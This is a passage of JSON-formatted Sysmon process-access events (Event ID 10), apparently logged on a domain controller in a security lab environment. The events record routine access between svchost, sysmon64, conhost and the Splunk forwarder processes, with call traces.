C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.355","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3182,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.355\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.355","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3183,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.355\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.355","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3184,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.355\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.355","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3185,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.355\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.355","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3186,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.355\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.355","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3187,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.355\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.355","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3188,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.355\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-0010A4220500}\r\nTargetProcessId: 3548\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.355","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-0010A4220500}","TargetProcessId":"3548","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3189,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:41.590\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-0010A4220500}\r\nSourceProcessId: 3548\r\nSourceThreadId: 3552\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:41.590","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-0010A4220500}","SourceProcessId":"3548","SourceThreadId":"3552","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program 